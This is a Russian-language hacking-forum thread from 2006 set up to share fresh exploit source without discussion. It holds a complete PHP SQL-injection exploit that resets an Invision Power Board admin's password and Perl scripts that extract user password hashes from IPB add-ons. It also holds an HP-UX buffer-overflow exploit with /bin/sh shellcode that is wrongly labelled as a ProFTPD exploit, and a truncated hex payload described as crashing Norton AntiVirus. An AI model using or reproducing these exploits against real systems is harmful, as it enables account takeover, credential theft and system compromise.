Exploits, Постим эксплойты |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Тема создана для того, что-бы закидывать сюда исходники свежих сплойтов!Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники, Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4)Описание:Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения. 1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. 2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Сплойт:» Exploit « /* ____ ________ __________ /____ \/__ __ \ /__________ \_ _ // _ \ / / / \ \ \\______ \__ __ \/ / // /__/ / / \| _/ | \ / / \_____ / / || | \ | / / /_____ / / / ||____|___/____/ \______/ \_/ / |_________/_____/\_______/\___/ === - security team - === Invision Power Board < 2.1.4 Password change SQL-Injection Exploit by roOstY Ru24 Security Team <= www.Ru24-Team.net => ---- For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of exploit you get link to change admin password) Working in all Invision Power Forum forum before 2.1.4 but you need good mysql version Greetz to Nitrex and Dukenn Regards to: Dr_UFO_51,k0pa,NSD,Naikon and other... Before runing,you must setup some settings WARNING: You must setup the CURL-module for PHP! ---- */ /* In any case at first you need to change password to $target if you can't understand that */ // error_reporting(E_ALL); ############ Settings ########################################################### $proxy="24.48.*.*:**"; ## - your socks 4/5-proxy $host=" http://forum.***.lt"; ## - target forum $login="****"; ## - login to forum $password="****"; ## - pass to forum $cook_name="ibf_topicsread"; ## - target cookie name (default: ibf_topicsread) $topic=22; ## - any real topyc $target=1; ## - id target to admin or other user that you want to reset password ##### # At first you need to reset pasword for target user. # For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of you get link to change admin password) #### $len=32; ## 5 for salt ## it's my $ver=1; ## if not wor change to 2 $cookie_file_path = "/tmp/cookie"; ## for my opinuion, you can to set other $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; ################################################################################ $cookie=""; echo "Login..."; $url=$host."/index.php?act=Login&CODE=01&CookieDate=1"; $reffer=$host."/index.php?act=Login&CODE=00"; $post['UserName']=urlencode($login); $post['PassWord']=urlencode($password); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,""); ###### Login to the forum $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then Login\n"; exit; } else echo "done\n"; echo "Redirecting to main page..."; $url=$host.urldecode(ExtractString($result,$host,"\" ")); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",""); ###### Redirect to the main page $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then Redirect\n"; exit; } else echo "done\n"; $reffer=$url; echo "Going to Control Panel..."; $url=$host."/index.php?act=UserCP&CODE=00"; $reffer="";$agent=""; $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",""); ###### Go te the control panel $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then going to Control\n"; exit; } echo "done\n"; echo "Get table prefix..."; $arr[$topic]=1111111111; $arr['-1) andd']=$topic; $cookie_base=""; foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; } $cookie_add=$cookie_base.$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!(strstr($result,"Error"))) { echo "error. Target seems not vuln"; exit; } $pref=ExtractString($result,"SELECT * FROM ","topics"); echo "done prefix: ".$pref."\n"; $al=""; echo "Checking Mysql version...."; $targval=explode(".",$target); $arr[$topic]=1111111111; $arr['-1) and @@version<4/*']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4 - GOOD!\n"; else { echo "done Mysql ver < 4. We can use only dos\n"; exit; } echo "Exploiting...."; $sent='%61%3A%32%3A%7B%73%3A'; if ($ver==1) $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,0,0,0,1,0,0,0,0,0,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*"; else $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,null,null,0,0,1,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*"; $arr[$topic]=1111111111; $arr[$exp]=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!strstr($result,"different number of columns")) { echo "done\n"; $vid=substr($result,strpos($result,"")-32,32); echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".$vid."] and change user password!\n"; } else { echo "bad Can't find number of colums\n"; } echo "Checking Mysql version 2...."; $targval=explode(".",$target); $arr[$topic]=1111111111; $arr['-1) and @@version<4.1/*']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); //echo $result;exit; if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4.1 - GOOD!\n"; else { echo "done Mysql ver < 4.1. We can't use SUBSELECT\n"; exit; } echo "Bruteforcing....\n"; $val=""; for ($j=16;$j<=$len;$j++) { $a2=128; $a1=32; while (($a2-$a1)>=5) { $s=round(($a1+$a2)/2,0); echo $s; $arr[$topic]=1111111111; $arr['-1) and '.$s.'>(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if ((strstr($result,"Error"))) { echo "Error querry!\n"; exit; } if (strstr($result,"showtopic")) $a2=$s; else $a1=$s; } for ($i=$a1;$i<=$a2;$i++) { echo $i; $arr[$topic]=1111111111; $arr['-1) and '.$i.'=(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); // echo urlencode(serialize($arr)).$result;exit; if (strstr($result,"showtopic")) { $val .= chr($i); echo " - Get_symb:[".$j."] ".chr($i)."\n"; break; } } } echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".strtolower($val)."] and change user password!\n"; function getcookiee($result) { $res = explode("\n",$result); foreach ($res as $k=>$v ) { if (ereg("Set-Cookie",$v)) { $c_a = explode(";",trim(str_replace("Set-Cookie:","",$v))); foreach ($c_a as $k=>$v ) { if (!(ereg("expires",$v))) { $arr=explode("=",trim($v)); $cook[trim($arr[0])]=trim($arr[1]); } } } } return $cook; } function querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) { $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); if ($post!="") { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } curl_setopt ($ch, CURLOPT_TIMEOUT, 120); curl_setopt ($ch, CURLOPT_PROXY, $proxy); curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt ($ch, CURLOPT_FAILONERROR, false); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_REFERER, $reffer); if ($cookie!="") curl_setopt($ch, CURLOPT_COOKIE, $cookie); // else { curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path); // } curl_setopt($ch, CURLOPT_HEADER, 1); $result = curl_exec($ch); $error=curl_errno($ch); curl_close ($ch); if ($error) $result="Fucking Error: ".$error."\r\n"; if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n"; if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n"; if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n"; return $result; } function ExtractString($str, $start, $end) { $str_low = ($str); if (strpos($str_low, $start) !== false && strpos($str_low, $end, strpos($str_low, $start)) !== false) { $pos1 = strpos($str_low, $start) + strlen($start); $pos2 = strpos($str_low, $end,strpos($str_low, $start)) - $pos1; return substr($str, $pos1, $pos2); } } ?> | |
| |
8.03.2006 - 23:52 |
PRYANIK
Made In Tula
[SoftoRooMTeaM]
Группа: Администраторы Сообщений: 31.141 Регистрация: 22.02.2004 Пользователь №: 7
Респектов: 6388
| D2-Shoutbox 4.2 (IPB Mod) SQL injection #!/usr/bin/perl #"Powered By D2-Shoutbox 4.2" ######################################################### use IO::Socket; $host = $ARGV[0]; $user = $ARGV[2]; $uid = $ARGV[3]; $pid = $ARGV[4]; $type = $ARGV[5];
sub type() { if($type==1){$row="password";} if($type==2){$row="member_login_key";} else{print "Just 1 Or 2\n";exit();} $sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*"; $path = $ARGV[1].$sql; }
sub header() { print q{ ####################################################################### ### D2-Shoutbox 4.2 SQL injection Exploit ### ### Tested On D2-Shoutbox 4.2 And IPB 2.4 ### ### Created By SkOd, Sed Security Team ### ####################################################################### sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)] sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2 ####################################################################### } }
sub sedsock() { $sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n"; print $sedsock "GET $path HTTP/1.1\n"; print $sedsock "Host: $host\n"; print $sedsock "Accept: */*\n"; print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n"; print $sedsock "Connection: close\n\n"; while($res = <$sedsock>){ $res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n"; } }
if(@ARGV < 6){ header(); }else{ type(); sedsock(); }
Invision Power Board Dragoran's Portal SQL injection #!/usr/bin/perl ############################################ #"Portal 1.3 by Dragoran" #########################################################
use IO::Socket; if (@ARGV < 3){ print q{ ############################################################ # IPB Portal 1.3 SQL injection Get Hash Exploit # # Tested on Invision Power Board 1.3.0 # # created By SkOd. SED Security Team # ############################################################ ipbpro.pl [HOST] [PATH] [Target id] ipbpro.pl www.host.com /forum/ 2 ############################################################
print "[+]Connecting...\n"; }; exit; } $serv = $ARGV[0]; $serv =~ s/(http:\/\/)//eg; $dir = $ARGV[1]; $id = $ARGV[2];
$inj = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*'; $inj2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*'; $inje=$inj; print "[+]User ID: $id\n"; print "[+]MD5 Hash: "; for ($i=1; $i<3; $i++) { if($i==2){ $inje=$inj2; } $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n"; print $socket "GET $inje HTTP/1.1\n"; print $socket "Host: $serv\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n"; while ($answer = <$socket>) { $answer =~ s/width="(.*%)"//eg; $answer =~ m/width="(.*?)"/ && print $1; } }
--------------------
Не работает ссылка? Пишите в теме, обновим :)! Link not working? Let us know in the comments, we'll fix it!Трудно найти слова, когда действительно есть что сказать. Э.М. Ремарк | |
| |
8.03.2006 - 23:53 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Invision Power Board < 2.1.4 Password change SQL-Injection ExploitСплойт тут: | |
| |
9.03.2006 - 8:33 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| QUOTE Мужики, я думаю будет лучше присоединять сплоиты в атач! Думаю тоже phpRPC <= 0.7 commands execute exploitЗатронутые продукты: MYPHPNUKE:myPHPNuke 1.8 SQUIRRELMAIL:squirrelmail 1.4 PUNBB:PunBB 1.2 PWSPHP:PwsPHP 1.2 MYBB:MyBB 1.0 EKINBOARD:EKINboard 1.0 FSCRIPTS:Fantastic News 2.1 WORDPRESS:Wordpress 2.0 TECASCRIPTS:Quirex 2.0 PERLBLOG:PerlBlog 1.08 PERLBLOG:PerlBlog 1.09 ARCHANGELMGT:Archangel Weblog 0.90 PHPRPC:phpRPC 0.7 TL4S:D3Jeeb Pro 3 CGICALENDAR:CGI Calendar 2.7 REYERO:DirectContact 3.0 LANSUITE:LanParty Intranet System 2.1 IGENUS:iGENUS Webmail 2.02 4HOMEPAGES:4images 1.7 ISSUEDEALER:Issue Dealer 0.9 JFACETS:JFacets 0.1 PARODIA:Parodia 6.2 NATHANLANDRY:n8cms 1.1 NATHANLANDRY:n8cms 1.2 FARSINEWS:FarsiNews 2.5 EJ3:EJ3 TOPo 2.2 SENDCARD:sendcard 3.3 STOREBOT:StoreBot 2002 STOREBOT:StoreBot 2005 Сплойт: | |
| |
9.03.2006 - 9:02 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Уязвимость в ProFTPD (exploit code)ProFTPD - FTP демон для UNIX и UNIX-подобных операционных систем. Хотя этот FTP демон позиционируется как безопасный FTP сервер, уязвимость в защите демона дает возможность DoS атаки с помощью большого количества команд "неправильного" размера. Эксплоит код демонстрирует данную уязвимость ProFTPD. Системы уязвимы:ProFTPD version 1.2.0rc1 ProFTPD version 1.2.0rc2 Сплойт: /* Copyright © 2001 Zorgon * All Rights Reserved * The copyright notice above does not evidence any * actual or intended publication of such source code. * * HP-UX /bin/cu exploit. * Tested on HP-UX 11.00 * [email protected] ( http://www.nightbird.free.fr) * */ #include #include #include #include #define LEN 9778 #define HPPA_NOP 0x0b390280 #define RET 0x7f7eb010 #define OFFSET 1200 /* it works for me */ u_char hppa_shellcode[] = /* K2 shellcode */ "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"; int main(int argc , char **argv){ char buffer[LEN+8]; int i; long retaddr = RET; int offset = OFFSET; if(argc>1) offset = atoi(argv[1]); for (i=0;i *(long *)&buffer[i] = retaddr + offset; for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++) *(buffer+i) = HPPA_NOP; memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode)); fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n"); fprintf(stderr, "Copyright © 2001 Zorgon\n"); fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer)); execl("/bin/cu","cu","-l",buffer,0); } | |
| |
9.03.2006 - 22:23 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Norton AntiVirus Crash by NAV.kill FileОтказ антивируса при сканировании определенных PE файлов. Сплойт:» Нажмите, для открытия спойлера « #include #include #include
unsigned char NAVkill[]= "\x50\x4B\x03\x04\x14\x00\x02\x00\x08\x00\x1B\xAD\x7C\x28\x93\x75\xDC" "\xC8\xF9\x09\x00\x00\x56\x88\x00\x00\x09\x00\x00\x00\x6C\x69\x62" "\x20\x30\x2E\x7A\x69\x70\xED\xDD\x57\x50\x53\xDB\x1A\x07\xF0\x48" "\x11\x38\x74\x95\x43\x00\xB1\x51\x22\x48\x95\x1A\xC4\xA0\xDC\x23" "\xBD\x09\x48\x95\x62\x28\x51\x8A\xE8\x0D\x2D\x14\x2B\x47\xE9\x10" "\x01\x29\x46\x94\x8E\x28\x51\x44\x7A\xB3\x25\xA0\x20\x08\xA2\x20" "\x52\x54\x04\xA4\xB7\x43\x09\x88\x1C\xBD\x8E\xF7\xC6\x87\x33\x37" "\x33\x79\xFD\xF6\x7E\x58\x7B\xCD\xDA\xFF\xF9\x5E\x7F\xB3\xF7\x2A" "\x16\xC6\xAC\x6C\x5B\x10\x2C\x08\x4E\x44\xDB\x9D\xB0\xDD\x54\xD7" "\xF1\x0D\x92\x9C\x08\xC4\x46\x3C\x02\xF1\x1B\x02\x81\xC0\xFA\xF9" "\x79\xEF\x50\x51\x08\x39\x71\x6A\xB2\xCF\x5B\xD3\x7A\x75\x1B\xC7" "\x8C\x14\x25\x6A\x2B\x97\x90\x44\xAA\xB4\x04\x3A\x39\xD4\x3D\xB7" "\xE3\x4F\xC1\x40\xA4\xE0\xAE\x0A\x11\x93\x29\xA1\xAC\xBA\xED\x96" "\x81\xE4\x46\x79\xD3\x08\x49\xC7\x4D\xFF\xE6\xEF\x4B\x2E\x71\xA2" "\x4A\x25\x79\x3F\xAE\xF4\x49\x15\xAC\xBA\x34\x4A\x6A\x25\x9C\x6E" "\x75\x6E\xC3\x67\xE2\x9C\x6F\xD0\x8A\x17\xB0\xFB\x1B\x46\xD6\xD7" "\xC9\x0B\x73\xA5\x99\x01\xB4\xB5\x17\x5C\xB5\xD7\x28\x89\xA6\x4D" "\x2E\x89\xDD\x17\x12\xD7\x90\x4F\x7A\x3A\xF4\x30\x6C\x86\x5C\x87" "\x04\x76\xB2\x1D\x24\x19\x9A\x61\x36\x90\xCF\xDC\x17\x95\x7D\xE4" "\x7E\x23\x7D\x83\x79\x5C\xEE\x8E\x5B\xB6\xF8\xFD\x81\x8A\x26\xF9" "\x22\x29\x26\xD9\xBE\xC2\xAD\x96\x52\x61\x05\xB8\x0B\x75\x1F\xF7" "\x39\x4A\x64\xE7\x16\x1A\x04\x4B\x78\x68\x1C\x4E\x4F\x5B\x7B\x30" "\x74\xCB\x8B\x1C\x55\xDB\x94\x77\x5B\x10\x5D\xBF\x68\xA4\x97\x23" "\xD3\x68\x67\x5A\x93\x13\x54\xA0\x45\xC8\xBB\x5C\x14\xAA\x68\x8A" "\x9A\xAA\xC6\x2C\xB6\x86\x4E\xD4\xD7\x5C\xEC\xB7\xD5\xDE\xEF\x9B" "\x42\x9E\x3F\xA0\x7F\xFD\xEB\x42\x0D\xCF\x99\xED\x64\xB3\xEC\x58" "\x73\x4C\x7E\x2E\xCD\x2C\x28\x95\xB5\x9C\xD3\x3B\xD9\x63\x5B\xB8" "\xAD\xCA\x5D\x9F\x86\xEE\xE9\x0F\x3A\x4B\x47\x1C\xAD\x58\x91\xFC" "\x5A\x38\x72\xC5\xCA\x26\xF3\x10\x13\x87\x5B\xB1\xCA\x21\xB6\x1E" "\x0A\x16\x9E\x1A\x7B\xDE\x18\x6B\x57\x3D\x35\xB8\x36\xE9\xAA\xF4" "\x71\x96\x4F\x8C\xF5\xD3\xB5\x82\xD4\xC0\xD4\x1A\x0B\xAF\x89\x2F" "\x89\xC2\xD5\x41\x4D\x9B\xFB\x1F\xF9\x0A\x0F\x74\x14\xB0\xB4\xF1" "\xBD\x2C\x6B\x46\x9A\x97\xE1\x74\xEC\x72\x37\x52\x85\x0D\x0B\x29" "\xE1\x7B\xF9\x9A\xBD\xAE\x6F\x9E\x53\xB0\xF5\xE8\x71\xF4\x1F\x77" "\x19\x42\xC5\x7E\xDE\xB2\xC2\x96\x4C\xB2\xA9\x29\xB8\x37\x26\x17" "\xE8\x85\xCD\xC2\x39\xA0\x8A\x4B\xD1\xAE\x72\xFB\xD1\xCA\xC1\xB4" "\xFB\x2E\x1F\xFB\x89\xE7\xC3\x83\xF6\x98\xA9\x28\x78\x1D\xCF\xBF" "\x34\x2C\x9D\xA1\x10\xB9\xB5\x5C\x6D\xE7\xF5\xE6\xFA\x30\x6B\xA2" "\x83\x92\xDA\xE2\x57\xE7\xD1\x55\x77\x63\xAB\x3F\x57\xA4\xBD\x4B" "\xE4\x6D\x26\x33\xD8\x59\x4A\x9C\x1D\x65\x70\xB9\x17\xF6\x36\xBD" "\xB3\x5F\x9B\x1D\xA7\x4D\x51\x6E\x64\x4F\xF0\xD5\x6D\xB1\xEA\x71" "\xD1\xDF\xDD\x90\x76\xA8\x6A\xA6\x4A\xD1\x8F\xBA\x78\x37\x6B\x30" "\x7E\x35\x1E\x93\x1B\x7E\x3A\xF6\xCB\x97\xFC\xF6\x2B\x7D\x7F\xA5" "\xA1\xD0\xA3\xD8\x4D\x7D\x3C\x2E\xC7\x25\x17\x8C\x3A\x94\x64\x76" "\x6B\xCE\x18\x7B\x4B\x35\x9C\xE8\x2B\x4F\x67\x75\x8B\x4D\x09\x89" "\x6B\xA0\xF9\xBD\x4F\xC1\x8B\xA9\xDF\x69\xE3\x92\xA3\x56\x2D\x9A" "\xD5\x4B\xF4\x1D\x0D\x93\x1C\xB6\xD5\xD0\x51\xC5\x38\xD3\xDC\x8B" "\x0C\x78\x50\xAA\x63\x96\x96\xC7\x47\xDB\xED\xFC\xAF\x53\xAD\x89" "\x8F\x15\x5F\x77\x46\x79\x06\xF7\xFA\x5A\x26\x2D\x34\x5F\x97\x28" "\x0F\xC9\xD3\xBA\xC5\xAF\x6F\xC8\x83\x9B\x34\xBE\x8A\x53\xAC\xCF" "\x3C\x51\xBB\x40\x74\x39\x30\xA0\x8B\xAB\x9E\x48\x2C\x0A\x5E\x41" "\x90\x71\x73\xBA\x76\xB9\x7E\xD7\xAA\xCD\x5E\x34\x46\x7F\xCE\xA1" "\xF9\xA7\x3E\x78\xC9\xB3\x62\xFE\xF6\xED\xC5\x59\x94\xEE\x96\xA9" "\xC2\x85\xBB\xC5\x48\x3F\xAA\xC9\xD5\x97\xB6\x33\x7C\x6A\xE2\xA9" "\xB8\xD2\x8B\x5C\x99\x38\x5B\x71\x7D\x76\xB2\x64\x89\x9D\x73\x68" "\xAD\x3E\xAF\x6C\x2F\x76\x6B\xF3\x0A\xEB\xCC\xA3\x5D\x8A\xF8\xB0" "\x20\x92\x41\xEA\x74\x81\x3E\x17\x27\x6F\x8C\xB5\x72\x03\xE9\xD9" "\x52\x9F\x50\x40\xC4\x15\x39\x7B\x21\xD4\x48\x24\xFE\x84\x0B\x77" "\x85\x98\x3D\x39\xDB\xA4\xED\x59\x6F\x68\x95\x05\xB2\xFC\xD3\xE3" "\xA6\x24\x8A\x63\xD0\xBD\x1E\xF9\x3E\x99\x6E\xEA\x45\x8E\x14\xA3" "\x93\xBE\x15\x78\x72\x3E\x41\xE4\xB6\x1A\xBA\xB7\xBF\xA7\xCB\x6D" "\x80\xB6\x63\x2A\x61\x7F\xFB\x3B\x1B\x67\x54\x44\x0C\xF6\xD9\x97" "\x96\x2A\x6E\xE2\x7C\x77\xDD\xB5\x37\xBB\x1A\x42\x25\xDD\x9D\x63" "\xF0\xAA\x1E\x6A\xC9\xCB\xFB\xF6\x99\x57\xC6\x91\x44\xD7\x9E\x7D" "\xAA\xE0\xB7\x57\xD7\x8F\x7B\x15\x5F\x36\xF4\x3C\xA5\xAB\xDB\xAF" "\x5D\xCB\x72\xC7\x88\x03\xA9\xE7\xA6\xA5\xCD\x81\xC6\xDA\x27\x0F" "\x8C\x1D\x4B\x4F\x5D\xCA\x78\xBC\x33\xBA\x6F\xB2\xD2\xBC\xF3\x18" "\x76\xFD\xBD\x93\xD8\xAD\x16\x31\xDE\xFC\x70\xC1\x35\x71\x42\xE6" "\xE9\x2C\x55\x93\x2C\xE5\xBC\x63\x45\x85\x01\x89\xCF\x0A\xDD\xBA" "\xCF\x1A\x3A\xFA\x58\x53\xE5\x73\x3F\xD3\x5C\x39\xD9\xBB\xE2\xEF" "\xEA\xE8\xE4\x65\x5C\x4A\xC1\x73\xC7\x2F\x97\x9D\x4C\xCD\x47\x13" "\xDA\x51\x36\xAD\x3A\x23\x94\x6E\xAF\x25\x6A\x01\x75\xEB\x99\xD5" "\x9D\xAF\xF6\x3E\x2F\x7D\x58\xC1\x52\x69\x6C\xD3\x31\x44\x24\x94" "\xCC\x45\x61\x1A\x91\x75\xE3\x47\x84\x72\xC3\xEA\x2A\x69\x28\x8A" "\x69\xE7\x91\x57\x6E\x79\x63\xD5\xB2\xBE\xDA\xC8\x1B\xF5\xB8\x7A" "\x49\x87\xD7\xD1\x59\xF6\x77\x88\x92\xE9\x2E\x15\x16\xEA\x9E\x67" "\x78\x09\x77\x7A\x33\x4E\x1B\x0C\x1C\xF1\x5D\x76\xF3\x50\x0D\x68" "\x09\xAC\x5A\x25\x79\xC9\x1D\x54\x92\x59\xF3\x14\xD6\xD3\x14\xDD" "\xE7\xFA\xF9\xBD\x0B\xB5\x5A\xCE\x76\xBD\x10\x5D\x91\x94\x22\x97" "\x69\xB7\xA7\x2F\xBD\xBF\xBD\x46\x13\x15\x97\x67\xDE\x79\x99\x62" "\x24\x1B\xD7\x1D\xDE\xAC\x86\x65\xDB\x38\x6B\x94\xBC\xE9\x79\xA8" "\xB2\xD3\x8D\xF4\x81\x60\xAB\x9C\x67\x5D\x65\xE5\x1E\x18\x77\x36" "\xBE\x4F\x75\x32\x21\x1D\xFE\x47\x87\xF9\x29\xB7\xF5\x9D\x35\x17" "\xA6\xD4\xF7\xD4\x16\x15\x2C\x53\xF6\x49\x3F\x51\x9F\x26\xE6\x8D" "\xEB\x8E\x84\xC4\x07\x12\x36\xD7\xF4\x96\x56\xE8\xFB\x74\x0D\x8A" "\xAF\xFD\xAB\xC4\x99\xBF\x66\x28\x33\x22\xD8\x52\xE7\xF7\x86\x6D" "\xF5\x4E\xE2\x41\xA6\x04\xD3\x7B\xBA\xD9\x5D\xE5\x97\x16\x27\x8B" "\xD7\x13\x7B\xC2\x82\xDF\xE3\x54\xC4\x92\x6E\x5E\x96\xCF\xDE\xDE" "\x84\x2A\x3A\x61\xD4\xBC\xDD\x40\xD4\x05\x65\xC5\xB6\x16\x59\xA5" "\x2C\x22\xF1\xE0\xE0\xD9\xE8\x31\x89\x47\x88\xDA\x69\xAB\x0B\x91" "\x58\x6E\xD3\xE0\x91\xE5\x0D\xF7\x7D\x9C\xEC\x5C\x1D\xEC\x7B\x75" "\xAD\x63\xDE\x07\x5C\x39\xF5\x98\x37\x65\xA0\x6C\x1A\x95\x11\xD2" "\xED\x5F\x97\x51\x52\x62\x9E\x8E\x7F\x20\xCA\xE5\x84\x1B\x49\x7D" "\x70\xC8\xDF\x2A\xEA\x4D\x67\xE3\x47\xAE\x37\x1A\x6E\x2D\x24\x8E" "\x85\x36\xFE\xA3\xC6\x75\x0D\x25\xBB\xAE\xD8\x7B\xA8\xF4\x0D\xE5" "\x99\x89\x37\xBE\xA6\xD6\xCA\x71\x35\x69\x44\xBF\x31\xCC\x53\xBB" "\x11\xEE\xD6\x7B\xED\xE6\xA9\xA9\x9B\x8E\x73\x96\xB1\x36\x29\xE4" "\xEC\xF2\xB0\xEE\xA8\x9A\xF8\x85\xBC\x43\x2C\x53\x44\x9B\xC5\x8F" "\xD6\x35\x03\x33\xEC\x81\x2C\x65\xDC\x49\x92\xED\xAF\x29\x65\x0E" "\xC5\x91\x02\x6F\x5E\x64\x94\x5E\x3A\x3C\xA9\x99\xB0\x8C\xEB\x88" "\x7D\x3E\xC1\x1E\x23\x70\x50\x2A\xFA\xDD\x87\x1C\xAA\x18\xD1\x4D" "\x48\xF0\xF0\x8B\x59\x76\xF1\xE2\xC9\xCA\xA7\x0D\x05\xDE\xDE\x9C" "\x31\xAD\x6D\x7A\x7A\xFC\x5A\xD6\x82\xB9\x25\x32\xBC\x3C\x22\x62" "\xCD\x3E\xC2\x5E\x64\x4C\xA8\x9F\x46\x28\xBF\x8D\xC4\xD7\x59\x5A" "\x8C\xDE\xF8\xB1\xE2\xEC\xBD\x8D\x52\x6A\x72\x5B\xD9\x07\x36\xBB" "\xBD\xFD\xCD\xD7\x9B\x93\x8B\xF8\x25\x5D\x31\x69\xA4\xF1\x18\x0A" "\x83\x4F\xAF\xE0\x6D\x3F\x10\xC1\xF3\x35\xC0\x82\x4F\x3D\xAD\x27" "\xA2\x88\x60\xA1\xE6\x85\xD9\x48\xC3\x4F\xB6\xCC\x8F\xCC\x73\x67" 